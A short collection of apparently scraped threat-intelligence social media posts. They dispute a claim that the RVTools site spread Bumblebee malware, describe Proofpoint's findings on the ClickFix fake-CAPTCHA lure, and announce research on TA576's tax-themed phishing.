This article that starts getting traction claims that the official RVTools website was distributing a malicious installer leading to Bumblebee. I see zero evidence of this actually being the case.
There is however at least two separate current malvertising/SEO campaigns, one leading to Bumblebee and one leading to SMOKEDHAM/Thundershell, but it's not from the official website.

⚠️ Proofpoint researchers have identified an increase in the unique #socialengineering technique called #ClickFix. ⚠️

The technique is being used by financially motivated threat actors and reportedly by suspected espionage-focused groups.

Read the security brief: https://ow.ly/WYXX50U9eZq

---

How the lure works: The #ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer.

Notably, we've observed threat actors using a fake CAPTCHA-themed lure that pretends to validate the user with a "Verify You Are Human" (CAPTCHA) check.

This activity leverages a toolkit named reCAPTCHA Phish, released by a security researcher on GitHub for educational purposes.

Just days after the open-source toolkit was released on GitHub, Proofpoint
began observing it in email threat data.

See our security brief for several recent examples of the ClickFix technique in action.

New research from @Ffforward and myself looking at the return of TA576, a cybercriminal threat actor that uses tax-themed lures specifically targeting accounting and finance organizations.

They always pop up during tax season in the US and use lures with funny back stories (help! my last accountant messed up my taxes).

https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax